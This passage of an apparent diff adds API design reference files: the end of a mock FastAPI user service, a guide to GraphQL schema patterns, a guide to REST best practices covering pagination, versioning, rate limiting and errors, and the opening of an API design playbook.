page: int = Query(1, ge=1),
|
||||
page_size: int = Query(20, ge=1, le=100),
|
||||
status: Optional[UserStatus] = Query(None),
|
||||
search: Optional[str] = Query(None)
|
||||
):
|
||||
"""List users with pagination and filtering."""
|
||||
# Mock implementation
|
||||
total = 100
|
||||
items = [
|
||||
User(
|
||||
id=str(i),
|
||||
email=f"user{i}@example.com",
|
||||
name=f"User {i}",
|
||||
status=UserStatus.ACTIVE,
|
||||
created_at=datetime.now(),
|
||||
updated_at=datetime.now()
|
||||
).model_dump()
|
||||
for i in range((page-1)*page_size, min(page*page_size, total))
|
||||
]
|
||||
|
||||
return PaginatedResponse(
|
||||
items=items,
|
||||
total=total,
|
||||
page=page,
|
||||
page_size=page_size,
|
||||
pages=(total + page_size - 1) // page_size
|
||||
)
|
||||
|
||||
@app.post("/api/users", response_model=User, status_code=status.HTTP_201_CREATED, tags=["Users"])
|
||||
async def create_user(user: UserCreate):
|
||||
"""Create a new user."""
|
||||
# Mock implementation
|
||||
return User(
|
||||
id="123",
|
||||
email=user.email,
|
||||
name=user.name,
|
||||
status=user.status,
|
||||
created_at=datetime.now(),
|
||||
updated_at=datetime.now()
|
||||
)
|
||||
|
||||
@app.get("/api/users/{user_id}", response_model=User, tags=["Users"])
|
||||
async def get_user(user_id: str = Path(..., description="User ID")):
|
||||
"""Get user by ID."""
|
||||
# Mock: Check if exists
|
||||
if user_id == "999":
|
||||
raise HTTPException(
|
||||
status_code=status.HTTP_404_NOT_FOUND,
|
||||
detail={"message": "User not found", "details": {"id": user_id}}
|
||||
)
|
||||
|
||||
return User(
|
||||
id=user_id,
|
||||
email="user@example.com",
|
||||
name="User Name",
|
||||
status=UserStatus.ACTIVE,
|
||||
created_at=datetime.now(),
|
||||
updated_at=datetime.now()
|
||||
)
|
||||
|
||||
@app.patch("/api/users/{user_id}", response_model=User, tags=["Users"])
|
||||
async def update_user(user_id: str, update: UserUpdate):
|
||||
"""Partially update user."""
|
||||
# Validate user exists
|
||||
existing = await get_user(user_id)
|
||||
|
||||
# Apply updates
|
||||
update_data = update.model_dump(exclude_unset=True)
|
||||
for field, value in update_data.items():
|
||||
setattr(existing, field, value)
|
||||
|
||||
existing.updated_at = datetime.now()
|
||||
return existing
|
||||
|
||||
@app.delete("/api/users/{user_id}", status_code=status.HTTP_204_NO_CONTENT, tags=["Users"])
|
||||
async def delete_user(user_id: str):
|
||||
"""Delete user."""
|
||||
await get_user(user_id) # Verify exists
|
||||
return None
|
||||
|
||||
if __name__ == "__main__":
|
||||
import uvicorn
|
||||
uvicorn.run(app, host="0.0.0.0", port=8000)
|
||||
@@ -0,0 +1,583 @@
|
||||
# GraphQL Schema Design Patterns
|
||||
|
||||
## Schema Organization
|
||||
|
||||
### Modular Schema Structure
|
||||
|
||||
```graphql
|
||||
# user.graphql
|
||||
type User {
|
||||
id: ID!
|
||||
email: String!
|
||||
name: String!
|
||||
posts: [Post!]!
|
||||
}
|
||||
|
||||
extend type Query {
|
||||
user(id: ID!): User
|
||||
users(first: Int, after: String): UserConnection!
|
||||
}
|
||||
|
||||
extend type Mutation {
|
||||
createUser(input: CreateUserInput!): CreateUserPayload!
|
||||
}
|
||||
|
||||
# post.graphql
|
||||
type Post {
|
||||
id: ID!
|
||||
title: String!
|
||||
content: String!
|
||||
author: User!
|
||||
}
|
||||
|
||||
extend type Query {
|
||||
post(id: ID!): Post
|
||||
}
|
||||
```
|
||||
|
||||
## Type Design Patterns
|
||||
|
||||
### 1. Non-Null Types
|
||||
|
||||
```graphql
|
||||
type User {
|
||||
id: ID! # Always required
|
||||
email: String! # Required
|
||||
phone: String # Optional (nullable)
|
||||
posts: [Post!]! # Non-null array of non-null posts
|
||||
tags: [String!] # Nullable array of non-null strings
|
||||
}
|
||||
```
|
||||
|
||||
### 2. Interfaces for Polymorphism
|
||||
|
||||
```graphql
|
||||
interface Node {
|
||||
id: ID!
|
||||
createdAt: DateTime!
|
||||
}
|
||||
|
||||
type User implements Node {
|
||||
id: ID!
|
||||
createdAt: DateTime!
|
||||
email: String!
|
||||
}
|
||||
|
||||
type Post implements Node {
|
||||
id: ID!
|
||||
createdAt: DateTime!
|
||||
title: String!
|
||||
}
|
||||
|
||||
type Query {
|
||||
node(id: ID!): Node
|
||||
}
|
||||
```
|
||||
|
||||
### 3. Unions for Heterogeneous Results
|
||||
|
||||
```graphql
|
||||
union SearchResult = User | Post | Comment
|
||||
|
||||
type Query {
|
||||
search(query: String!): [SearchResult!]!
|
||||
}
|
||||
|
||||
# Query example
|
||||
{
|
||||
search(query: "graphql") {
|
||||
... on User {
|
||||
name
|
||||
email
|
||||
}
|
||||
... on Post {
|
||||
title
|
||||
content
|
||||
}
|
||||
... on Comment {
|
||||
text
|
||||
author {
|
||||
name
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 4. Input Types
|
||||
|
||||
```graphql
|
||||
input CreateUserInput {
|
||||
email: String!
|
||||
name: String!
|
||||
password: String!
|
||||
profileInput: ProfileInput
|
||||
}
|
||||
|
||||
input ProfileInput {
|
||||
bio: String
|
||||
avatar: String
|
||||
website: String
|
||||
}
|
||||
|
||||
input UpdateUserInput {
|
||||
id: ID!
|
||||
email: String
|
||||
name: String
|
||||
profileInput: ProfileInput
|
||||
}
|
||||
```
|
||||
|
||||
## Pagination Patterns
|
||||
|
||||
### Relay Cursor Pagination (Recommended)
|
||||
|
||||
```graphql
|
||||
type UserConnection {
|
||||
edges: [UserEdge!]!
|
||||
pageInfo: PageInfo!
|
||||
totalCount: Int!
|
||||
}
|
||||
|
||||
type UserEdge {
|
||||
node: User!
|
||||
cursor: String!
|
||||
}
|
||||
|
||||
type PageInfo {
|
||||
hasNextPage: Boolean!
|
||||
hasPreviousPage: Boolean!
|
||||
startCursor: String
|
||||
endCursor: String
|
||||
}
|
||||
|
||||
type Query {
|
||||
users(first: Int, after: String, last: Int, before: String): UserConnection!
|
||||
}
|
||||
|
||||
# Usage
|
||||
{
|
||||
users(first: 10, after: "cursor123") {
|
||||
edges {
|
||||
cursor
|
||||
node {
|
||||
id
|
||||
name
|
||||
}
|
||||
}
|
||||
pageInfo {
|
||||
hasNextPage
|
||||
endCursor
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Offset Pagination (Simpler)
|
||||
|
||||
```graphql
|
||||
type UserList {
|
||||
items: [User!]!
|
||||
total: Int!
|
||||
page: Int!
|
||||
pageSize: Int!
|
||||
}
|
||||
|
||||
type Query {
|
||||
users(page: Int = 1, pageSize: Int = 20): UserList!
|
||||
}
|
||||
```
|
||||
|
||||
## Mutation Design Patterns
|
||||
|
||||
### 1. Input/Payload Pattern
|
||||
|
||||
```graphql
|
||||
input CreatePostInput {
|
||||
title: String!
|
||||
content: String!
|
||||
tags: [String!]
|
||||
}
|
||||
|
||||
type CreatePostPayload {
|
||||
post: Post
|
||||
errors: [Error!]
|
||||
success: Boolean!
|
||||
}
|
||||
|
||||
type Error {
|
||||
field: String
|
||||
message: String!
|
||||
code: String!
|
||||
}
|
||||
|
||||
type Mutation {
|
||||
createPost(input: CreatePostInput!): CreatePostPayload!
|
||||
}
|
||||
```
|
||||
|
||||
### 2. Optimistic Response Support
|
||||
|
||||
```graphql
|
||||
type UpdateUserPayload {
|
||||
user: User
|
||||
clientMutationId: String
|
||||
errors: [Error!]
|
||||
}
|
||||
|
||||
input UpdateUserInput {
|
||||
id: ID!
|
||||
name: String
|
||||
clientMutationId: String
|
||||
}
|
||||
|
||||
type Mutation {
|
||||
updateUser(input: UpdateUserInput!): UpdateUserPayload!
|
||||
}
|
||||
```
|
||||
|
||||
### 3. Batch Mutations
|
||||
|
||||
```graphql
|
||||
input BatchCreateUserInput {
|
||||
users: [CreateUserInput!]!
|
||||
}
|
||||
|
||||
type BatchCreateUserPayload {
|
||||
results: [CreateUserResult!]!
|
||||
successCount: Int!
|
||||
errorCount: Int!
|
||||
}
|
||||
|
||||
type CreateUserResult {
|
||||
user: User
|
||||
errors: [Error!]
|
||||
index: Int!
|
||||
}
|
||||
|
||||
type Mutation {
|
||||
batchCreateUsers(input: BatchCreateUserInput!): BatchCreateUserPayload!
|
||||
}
|
||||
```
|
||||
|
||||
## Field Design
|
||||
|
||||
### Arguments and Filtering
|
||||
|
||||
```graphql
|
||||
type Query {
|
||||
posts(
|
||||
# Pagination
|
||||
first: Int = 20
|
||||
after: String
|
||||
|
||||
# Filtering
|
||||
status: PostStatus
|
||||
authorId: ID
|
||||
tag: String
|
||||
|
||||
# Sorting
|
||||
orderBy: PostOrderBy = CREATED_AT
|
||||
orderDirection: OrderDirection = DESC
|
||||
|
||||
# Searching
|
||||
search: String
|
||||
): PostConnection!
|
||||
}
|
||||
|
||||
enum PostStatus {
|
||||
DRAFT
|
||||
PUBLISHED
|
||||
ARCHIVED
|
||||
}
|
||||
|
||||
enum PostOrderBy {
|
||||
CREATED_AT
|
||||
UPDATED_AT
|
||||
TITLE
|
||||
}
|
||||
|
||||
enum OrderDirection {
|
||||
ASC
|
||||
DESC
|
||||
}
|
||||
```
|
||||
|
||||
### Computed Fields
|
||||
|
||||
```graphql
|
||||
type User {
|
||||
firstName: String!
|
||||
lastName: String!
|
||||
fullName: String! # Computed in resolver
|
||||
posts: [Post!]!
|
||||
postCount: Int! # Computed, doesn't load all posts
|
||||
}
|
||||
|
||||
type Post {
|
||||
likeCount: Int!
|
||||
commentCount: Int!
|
||||
isLikedByViewer: Boolean! # Context-dependent
|
||||
}
|
||||
```
|
||||
|
||||
## Subscriptions
|
||||
|
||||
```graphql
|
||||
type Subscription {
|
||||
postAdded: Post!
|
||||
|
||||
postUpdated(postId: ID!): Post!
|
||||
|
||||
userStatusChanged(userId: ID!): UserStatus!
|
||||
}
|
||||
|
||||
type UserStatus {
|
||||
userId: ID!
|
||||
online: Boolean!
|
||||
lastSeen: DateTime!
|
||||
}
|
||||
|
||||
# Client usage
|
||||
subscription {
|
||||
postAdded {
|
||||
id
|
||||
title
|
||||
author {
|
||||
name
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Custom Scalars
|
||||
|
||||
```graphql
|
||||
scalar DateTime
|
||||
scalar Email
|
||||
scalar URL
|
||||
scalar JSON
|
||||
scalar Money
|
||||
|
||||
type User {
|
||||
email: Email!
|
||||
website: URL
|
||||
createdAt: DateTime!
|
||||
metadata: JSON
|
||||
}
|
||||
|
||||
type Product {
|
||||
price: Money!
|
||||
}
|
||||
```
|
||||
|
||||
## Directives
|
||||
|
||||
### Built-in Directives
|
||||
|
||||
```graphql
|
||||
type User {
|
||||
name: String!
|
||||
email: String! @deprecated(reason: "Use emails field instead")
|
||||
emails: [String!]!
|
||||
|
||||
# Conditional inclusion
|
||||
privateData: PrivateData @include(if: $isOwner)
|
||||
}
|
||||
|
||||
# Query
|
||||
query GetUser($isOwner: Boolean!) {
|
||||
user(id: "123") {
|
||||
name
|
||||
privateData @include(if: $isOwner) {
|
||||
ssn
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Custom Directives
|
||||
|
||||
```graphql
|
||||
directive @auth(requires: Role = USER) on FIELD_DEFINITION
|
||||
|
||||
enum Role {
|
||||
USER
|
||||
ADMIN
|
||||
MODERATOR
|
||||
}
|
||||
|
||||
type Mutation {
|
||||
deleteUser(id: ID!): Boolean! @auth(requires: ADMIN)
|
||||
updateProfile(input: ProfileInput!): User! @auth
|
||||
}
|
||||
```
|
||||
|
||||
## Error Handling
|
||||
|
||||
### Union Error Pattern
|
||||
|
||||
```graphql
|
||||
type User {
|
||||
id: ID!
|
||||
email: String!
|
||||
}
|
||||
|
||||
type ValidationError {
|
||||
field: String!
|
||||
message: String!
|
||||
}
|
||||
|
||||
type NotFoundError {
|
||||
message: String!
|
||||
resourceType: String!
|
||||
resourceId: ID!
|
||||
}
|
||||
|
||||
type AuthorizationError {
|
||||
message: String!
|
||||
}
|
||||
|
||||
union UserResult = User | ValidationError | NotFoundError | AuthorizationError
|
||||
|
||||
type Query {
|
||||
user(id: ID!): UserResult!
|
||||
}
|
||||
|
||||
# Usage
|
||||
{
|
||||
user(id: "123") {
|
||||
... on User {
|
||||
id
|
||||
email
|
||||
}
|
||||
... on NotFoundError {
|
||||
message
|
||||
resourceType
|
||||
}
|
||||
... on AuthorizationError {
|
||||
message
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Errors in Payload
|
||||
|
||||
```graphql
|
||||
type CreateUserPayload {
|
||||
user: User
|
||||
errors: [Error!]
|
||||
success: Boolean!
|
||||
}
|
||||
|
||||
type Error {
|
||||
field: String
|
||||
message: String!
|
||||
code: ErrorCode!
|
||||
}
|
||||
|
||||
enum ErrorCode {
|
||||
VALIDATION_ERROR
|
||||
UNAUTHORIZED
|
||||
NOT_FOUND
|
||||
INTERNAL_ERROR
|
||||
}
|
||||
```
|
||||
|
||||
## N+1 Query Problem Solutions
|
||||
|
||||
### DataLoader Pattern
|
||||
|
||||
```python
|
||||
from aiodataloader import DataLoader
|
||||
|
||||
class PostLoader(DataLoader):
|
||||
async def batch_load_fn(self, post_ids):
|
||||
posts = await db.posts.find({"id": {"$in": post_ids}})
|
||||
post_map = {post["id"]: post for post in posts}
|
||||
return [post_map.get(pid) for pid in post_ids]
|
||||
|
||||
# Resolver
|
||||
@user_type.field("posts")
|
||||
async def resolve_posts(user, info):
|
||||
loader = info.context["loaders"]["post"]
|
||||
return await loader.load_many(user["post_ids"])
|
||||
```
|
||||
|
||||
### Query Depth Limiting
|
||||
|
||||
```python
|
||||
from graphql import GraphQLError
|
||||
|
||||
def depth_limit_validator(max_depth: int):
|
||||
def validate(context, node, ancestors):
|
||||
depth = len(ancestors)
|
||||
if depth > max_depth:
|
||||
raise GraphQLError(
|
||||
f"Query depth {depth} exceeds maximum {max_depth}"
|
||||
)
|
||||
return validate
|
||||
```
|
||||
|
||||
### Query Complexity Analysis
|
||||
|
||||
```python
|
||||
def complexity_limit_validator(max_complexity: int):
|
||||
def calculate_complexity(node):
|
||||
# Each field = 1, lists multiply
|
||||
complexity = 1
|
||||
if is_list_field(node):
|
||||
complexity *= get_list_size_arg(node)
|
||||
return complexity
|
||||
|
||||
return validate_complexity
|
||||
```
|
||||
|
||||
## Schema Versioning
|
||||
|
||||
### Field Deprecation
|
||||
|
||||
```graphql
|
||||
type User {
|
||||
name: String! @deprecated(reason: "Use firstName and lastName")
|
||||
firstName: String!
|
||||
lastName: String!
|
||||
}
|
||||
```
|
||||
|
||||
### Schema Evolution
|
||||
|
||||
```graphql
|
||||
# v1 - Initial
|
||||
type User {
|
||||
name: String!
|
||||
}
|
||||
|
||||
# v2 - Add optional field (backward compatible)
|
||||
type User {
|
||||
name: String!
|
||||
email: String
|
||||
}
|
||||
|
||||
# v3 - Deprecate and add new field
|
||||
type User {
|
||||
name: String! @deprecated(reason: "Use firstName/lastName")
|
||||
firstName: String!
|
||||
lastName: String!
|
||||
email: String
|
||||
}
|
||||
```
|
||||
|
||||
## Best Practices Summary
|
||||
|
||||
1. **Nullable vs Non-Null**: Start nullable, make non-null when guaranteed
|
||||
2. **Input Types**: Always use input types for mutations
|
||||
3. **Payload Pattern**: Return errors in mutation payloads
|
||||
4. **Pagination**: Use cursor-based for infinite scroll, offset for simple cases
|
||||
5. **Naming**: Use camelCase for fields, PascalCase for types
|
||||
6. **Deprecation**: Use `@deprecated` instead of removing fields
|
||||
7. **DataLoaders**: Always use for relationships to prevent N+1
|
||||
8. **Complexity Limits**: Protect against expensive queries
|
||||
9. **Custom Scalars**: Use for domain-specific types (Email, DateTime)
|
||||
10. **Documentation**: Document all fields with descriptions
|
||||
@@ -0,0 +1,408 @@
|
||||
# REST API Best Practices
|
||||
|
||||
## URL Structure
|
||||
|
||||
### Resource Naming
|
||||
|
||||
```
|
||||
# Good - Plural nouns
|
||||
GET /api/users
|
||||
GET /api/orders
|
||||
GET /api/products
|
||||
|
||||
# Bad - Verbs or mixed conventions
|
||||
GET /api/getUser
|
||||
GET /api/user (inconsistent singular)
|
||||
POST /api/createOrder
|
||||
```
|
||||
|
||||
### Nested Resources
|
||||
|
||||
```
|
||||
# Shallow nesting (preferred)
|
||||
GET /api/users/{id}/orders
|
||||
GET /api/orders/{id}
|
||||
|
||||
# Deep nesting (avoid)
|
||||
GET /api/users/{id}/orders/{orderId}/items/{itemId}/reviews
|
||||
# Better:
|
||||
GET /api/order-items/{id}/reviews
|
||||
```
|
||||
|
||||
## HTTP Methods and Status Codes
|
||||
|
||||
### GET - Retrieve Resources
|
||||
|
||||
```
|
||||
GET /api/users → 200 OK (with list)
|
||||
GET /api/users/{id} → 200 OK or 404 Not Found
|
||||
GET /api/users?page=2 → 200 OK (paginated)
|
||||
```
|
||||
|
||||
### POST - Create Resources
|
||||
|
||||
```
|
||||
POST /api/users
|
||||
Body: {"name": "John", "email": "john@example.com"}
|
||||
→ 201 Created
|
||||
Location: /api/users/123
|
||||
Body: {"id": "123", "name": "John", ...}
|
||||
|
||||
POST /api/users (validation error)
|
||||
→ 422 Unprocessable Entity
|
||||
Body: {"errors": [...]}
|
||||
```
|
||||
|
||||
### PUT - Replace Resources
|
||||
|
||||
```
|
||||
PUT /api/users/{id}
|
||||
Body: {complete user object}
|
||||
→ 200 OK (updated)
|
||||
→ 404 Not Found (doesn't exist)
|
||||
|
||||
# Must include ALL fields
|
||||
```
|
||||
|
||||
### PATCH - Partial Update
|
||||
|
||||
```
|
||||
PATCH /api/users/{id}
|
||||
Body: {"name": "Jane"} (only changed fields)
|
||||
→ 200 OK
|
||||
→ 404 Not Found
|
||||
```
|
||||
|
||||
### DELETE - Remove Resources
|
||||
|
||||
```
|
||||
DELETE /api/users/{id}
|
||||
→ 204 No Content (deleted)
|
||||
→ 404 Not Found
|
||||
→ 409 Conflict (can't delete due to references)
|
||||
```
|
||||
|
||||
## Filtering, Sorting, and Searching
|
||||
|
||||
### Query Parameters
|
||||
|
||||
```
|
||||
# Filtering
|
||||
GET /api/users?status=active
|
||||
GET /api/users?role=admin&status=active
|
||||
|
||||
# Sorting
|
||||
GET /api/users?sort=created_at
|
||||
GET /api/users?sort=-created_at (descending)
|
||||
GET /api/users?sort=name,created_at
|
||||
|
||||
# Searching
|
||||
GET /api/users?search=john
|
||||
GET /api/users?q=john
|
||||
|
||||
# Field selection (sparse fieldsets)
|
||||
GET /api/users?fields=id,name,email
|
||||
```
|
||||
|
||||
## Pagination Patterns
|
||||
|
||||
### Offset-Based Pagination
|
||||
|
||||
```python
|
||||
GET /api/users?page=2&page_size=20
|
||||
|
||||
Response:
|
||||
{
|
||||
"items": [...],
|
||||
"page": 2,
|
||||
"page_size": 20,
|
||||
"total": 150,
|
||||
"pages": 8
|
||||
}
|
||||
```
|
||||
|
||||
### Cursor-Based Pagination (for large datasets)
|
||||
|
||||
```python
|
||||
GET /api/users?limit=20&cursor=eyJpZCI6MTIzfQ
|
||||
|
||||
Response:
|
||||
{
|
||||
"items": [...],
|
||||
"next_cursor": "eyJpZCI6MTQzfQ",
|
||||
"has_more": true
|
||||
}
|
||||
```
|
||||
|
||||
### Link Header Pagination (RESTful)
|
||||
|
||||
```
|
||||
GET /api/users?page=2
|
||||
|
||||
Response Headers:
|
||||
Link: <https://api.example.com/users?page=3>; rel="next",
|
||||
<https://api.example.com/users?page=1>; rel="prev",
|
||||
<https://api.example.com/users?page=1>; rel="first",
|
||||
<https://api.example.com/users?page=8>; rel="last"
|
||||
```
|
||||
|
||||
## Versioning Strategies
|
||||
|
||||
### URL Versioning (Recommended)
|
||||
|
||||
```
|
||||
/api/v1/users
|
||||
/api/v2/users
|
||||
|
||||
Pros: Clear, easy to route
|
||||
Cons: Multiple URLs for same resource
|
||||
```
|
||||
|
||||
### Header Versioning
|
||||
|
||||
```
|
||||
GET /api/users
|
||||
Accept: application/vnd.api+json; version=2
|
||||
|
||||
Pros: Clean URLs
|
||||
Cons: Less visible, harder to test
|
||||
```
|
||||
|
||||
### Query Parameter
|
||||
|
||||
```
|
||||
GET /api/users?version=2
|
||||
|
||||
Pros: Easy to test
|
||||
Cons: Optional parameter can be forgotten
|
||||
```
|
||||
|
||||
## Rate Limiting
|
||||
|
||||
### Headers
|
||||
|
||||
```
|
||||
X-RateLimit-Limit: 1000
|
||||
X-RateLimit-Remaining: 742
|
||||
X-RateLimit-Reset: 1640000000
|
||||
|
||||
Response when limited:
|
||||
429 Too Many Requests
|
||||
Retry-After: 3600
|
||||
```
|
||||
|
||||
### Implementation Pattern
|
||||
|
||||
```python
|
||||
from fastapi import HTTPException, Request
|
||||
from datetime import datetime, timedelta
|
||||
|
||||
class RateLimiter:
|
||||
def __init__(self, calls: int, period: int):
|
||||
self.calls = calls
|
||||
self.period = period
|
||||
self.cache = {}
|
||||
|
||||
def check(self, key: str) -> bool:
|
||||
now = datetime.now()
|
||||
if key not in self.cache:
|
||||
self.cache[key] = []
|
||||
|
||||
# Remove old requests
|
||||
self.cache[key] = [
|
||||
ts for ts in self.cache[key]
|
||||
if now - ts < timedelta(seconds=self.period)
|
||||
]
|
||||
|
||||
if len(self.cache[key]) >= self.calls:
|
||||
return False
|
||||
|
||||
self.cache[key].append(now)
|
||||
return True
|
||||
|
||||
limiter = RateLimiter(calls=100, period=60)
|
||||
|
||||
@app.get("/api/users")
|
||||
async def get_users(request: Request):
|
||||
if not limiter.check(request.client.host):
|
||||
raise HTTPException(
|
||||
status_code=429,
|
||||
headers={"Retry-After": "60"}
|
||||
)
|
||||
return {"users": [...]}
|
||||
```
|
||||
|
||||
## Authentication and Authorization
|
||||
|
||||
### Bearer Token
|
||||
|
||||
```
|
||||
Authorization: Bearer eyJhbGciOiJIUzI1NiIs...
|
||||
|
||||
401 Unauthorized - Missing/invalid token
|
||||
403 Forbidden - Valid token, insufficient permissions
|
||||
```
|
||||
|
||||
### API Keys
|
||||
|
||||
```
|
||||
X-API-Key: your-api-key-here
|
||||
```
|
||||
|
||||
## Error Response Format
|
||||
|
||||
### Consistent Structure
|
||||
|
||||
```json
|
||||
{
|
||||
"error": {
|
||||
"code": "VALIDATION_ERROR",
|
||||
"message": "Request validation failed",
|
||||
"details": [
|
||||
{
|
||||
"field": "email",
|
||||
"message": "Invalid email format",
|
||||
"value": "not-an-email"
|
||||
}
|
||||
],
|
||||
"timestamp": "2025-10-16T12:00:00Z",
|
||||
"path": "/api/users"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Status Code Guidelines
|
||||
|
||||
- `200 OK`: Successful GET, PATCH, PUT
|
||||
- `201 Created`: Successful POST
|
||||
- `204 No Content`: Successful DELETE
|
||||
- `400 Bad Request`: Malformed request
|
||||
- `401 Unauthorized`: Authentication required
|
||||
- `403 Forbidden`: Authenticated but not authorized
|
||||
- `404 Not Found`: Resource doesn't exist
|
||||
- `409 Conflict`: State conflict (duplicate email, etc.)
|
||||
- `422 Unprocessable Entity`: Validation errors
|
||||
- `429 Too Many Requests`: Rate limited
|
||||
- `500 Internal Server Error`: Server error
|
||||
- `503 Service Unavailable`: Temporary downtime
|
||||
|
||||
## Caching
|
||||
|
||||
### Cache Headers
|
||||
|
||||
```
|
||||
# Client caching
|
||||
Cache-Control: public, max-age=3600
|
||||
|
||||
# No caching
|
||||
Cache-Control: no-cache, no-store, must-revalidate
|
||||
|
||||
# Conditional requests
|
||||
ETag: "33a64df551425fcc55e4d42a148795d9f25f89d4"
|
||||
If-None-Match: "33a64df551425fcc55e4d42a148795d9f25f89d4"
|
||||
→ 304 Not Modified
|
||||
```
|
||||
|
||||
## Bulk Operations
|
||||
|
||||
### Batch Endpoints
|
||||
|
||||
```python
|
||||
POST /api/users/batch
|
||||
{
|
||||
"items": [
|
||||
{"name": "User1", "email": "user1@example.com"},
|
||||
{"name": "User2", "email": "user2@example.com"}
|
||||
]
|
||||
}
|
||||
|
||||
Response:
|
||||
{
|
||||
"results": [
|
||||
{"id": "1", "status": "created"},
|
||||
{"id": null, "status": "failed", "error": "Email already exists"}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
## Idempotency
|
||||
|
||||
### Idempotency Keys
|
||||
|
||||
```
|
||||
POST /api/orders
|
||||
Idempotency-Key: unique-key-123
|
||||
|
||||
If duplicate request:
|
||||
→ 200 OK (return cached response)
|
||||
```
|
||||
|
||||
## CORS Configuration
|
||||
|
||||
```python
|
||||
from fastapi.middleware.cors import CORSMiddleware
|
||||
|
||||
app.add_middleware(
|
||||
CORSMiddleware,
|
||||
allow_origins=["https://example.com"],
|
||||
allow_credentials=True,
|
||||
allow_methods=["*"],
|
||||
allow_headers=["*"],
|
||||
)
|
||||
```
|
||||
|
||||
## Documentation with OpenAPI
|
||||
|
||||
```python
|
||||
from fastapi import FastAPI
|
||||
|
||||
app = FastAPI(
|
||||
title="My API",
|
||||
description="API for managing users",
|
||||
version="1.0.0",
|
||||
docs_url="/docs",
|
||||
redoc_url="/redoc"
|
||||
)
|
||||
|
||||
@app.get(
|
||||
"/api/users/{user_id}",
|
||||
summary="Get user by ID",
|
||||
response_description="User details",
|
||||
tags=["Users"]
|
||||
)
|
||||
async def get_user(
|
||||
user_id: str = Path(..., description="The user ID")
|
||||
):
|
||||
"""
|
||||
Retrieve user by ID.
|
||||
|
||||
Returns full user profile including:
|
||||
- Basic information
|
||||
- Contact details
|
||||
- Account status
|
||||
"""
|
||||
pass
|
||||
```
|
||||
|
||||
## Health and Monitoring Endpoints
|
||||
|
||||
```python
|
||||
@app.get("/health")
|
||||
async def health_check():
|
||||
return {
|
||||
"status": "healthy",
|
||||
"version": "1.0.0",
|
||||
"timestamp": datetime.now().isoformat()
|
||||
}
|
||||
|
||||
@app.get("/health/detailed")
|
||||
async def detailed_health():
|
||||
return {
|
||||
"status": "healthy",
|
||||
"checks": {
|
||||
"database": await check_database(),
|
||||
"redis": await check_redis(),
|
||||
"external_api": await check_external_api()
|
||||
}
|
||||
}
|
||||
```
|
||||
@@ -0,0 +1,513 @@
|
||||
# API Design Principles Implementation Playbook
|
||||
|
||||
This file contains detailed patterns, checklists, and code samples referenced by the skill.
|
||||
|
||||
## Core Concepts
|
||||
|
||||
### 1. RESTful Design Principles
|
||||
|
||||
**Resource-Oriented Architecture**
|
||||
|
||||
- Resources are nouns (users, orders, products), not verbs
|
||||
- Use HTTP methods for actions (GET, POST, PUT, PATCH, DELETE)
|
||||
- URLs represent resource hierarchies
|
||||
- Consistent naming conventions
|
||||
|
||||
**HTTP Methods Semantics:**
|
||||
|
||||
- `GET`: Retrieve resources (idempotent, safe)
|
||||
- `POST`: Create new resources
|
||||
- `PUT`: Replace entire resource (idempotent)
|
||||
- `PATCH`: Partial resource updates
|
||||
- `DELETE`: Remove resources (idempotent)
|
||||
|
||||
### 2. GraphQL Design Principles
|
||||
|
||||
**Schema-First Development**
|
||||
|
||||
- Types define your domain model
|
||||
- Queries for reading data
|
||||
- Mutations for modifying data
|
||||
- Subscriptions for real-time updates
|
||||
|
||||
**Query Structure:**
|
||||
|
||||
- Clients request exactly what they need
|
||||
- Single endpoint, multiple operations
|
||||
- Strongly typed schema
|
||||
- Introspection built-in
|
||||
|
||||
### 3. API Versioning Strategies
|
||||
|
||||
**URL Versioning:**
|
||||
|
||||
```
|
||||
/api/v1/users
|
||||
/api/v2/users
|
||||
```
|
||||
|
||||
**Header Versioning:**
|
||||
|
||||
```
|
||||
Accept: application/vnd.api+json; version=1
|
||||
```
|
||||
|
||||
**Query Parameter Versioning:**
|
||||
|
||||
```
|
||||
/api/users?version=1
|
||||
```
|
||||
|
||||
## REST API Design Patterns
|
||||
|
||||
### Pattern 1: Resource Collection Design
|
||||
|
||||
```python
|
||||
# Good: Resource-oriented endpoints
|
||||
GET /api/users # List users (with pagination)
|
||||
POST /api/users # Create user
|
||||
GET /api/users/{id} # Get specific user
|
||||
PUT /api/users/{id} # Replace user
|
||||
PATCH /api/users/{id} # Update user fields
|
||||
DELETE /api/users/{id} # Delete user
|
||||
|
||||
# Nested resources
|
||||
GET /api/users/{id}/orders # Get user's orders
|
||||
POST /api/users/{id}/orders # Create order for user
|
||||
|
||||
# Bad: Action-oriented endpoints (avoid)
|
||||
POST /api/createUser
|
||||
POST /api/getUserById
|
||||
POST /api/deleteUser
|
||||
```
|
||||
|
||||
### Pattern 2: Pagination and Filtering
|
||||
|
||||
```python
|
||||
from typing import List, Optional
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
class PaginationParams(BaseModel):
|
||||
page: int = Field(1, ge=1, description="Page number")
|
||||
page_size: int = Field(20, ge=1, le=100, description="Items per page")
|
||||
|
||||
class FilterParams(BaseModel):
|
||||
status: Optional[str] = None
|
||||
created_after: Optional[str] = None
|
||||
search: Optional[str] = None
|
||||
|
||||
class PaginatedResponse(BaseModel):
|
||||
items: List[dict]
|
||||
total: int
|
||||
page: int
|
||||
page_size: int
|
||||
pages: int
|
||||
|
||||
@property
|
||||
def has_next(self) -> bool:
|
||||
return self.page < self.pages
|
||||
|
||||
@property
|
||||
def has_prev(self) -> bool:
|
||||
return self.page > 1
|
||||
|
||||
# FastAPI endpoint example
|
||||
from fastapi import FastAPI, Query, Depends
|
||||
|
||||
app = FastAPI()
|
||||
|
||||
@app.get("/api/users", response_model=PaginatedResponse)
|
||||
async def list_users(
|
||||
page: int = Query(1, ge=1),
|
||||
page_size: int = Query(20, ge=1, le=100),
|
||||
status: Optional[str] = Query(None),
|
||||
search: Optional[str] = Query(None)
|
||||
):
|
||||
# Apply filters
|
||||
query = build_query(status=status, search=search)
|
||||
|
||||
# Count total
|
||||
total = await count_users(query)
|
||||
|
||||
# Fetch page
|
||||
offset = (page - 1) * page_size
|
||||
users = await fetch_users(query, limit=page_size, offset=offset)
|
||||
|
||||
return PaginatedResponse(
|
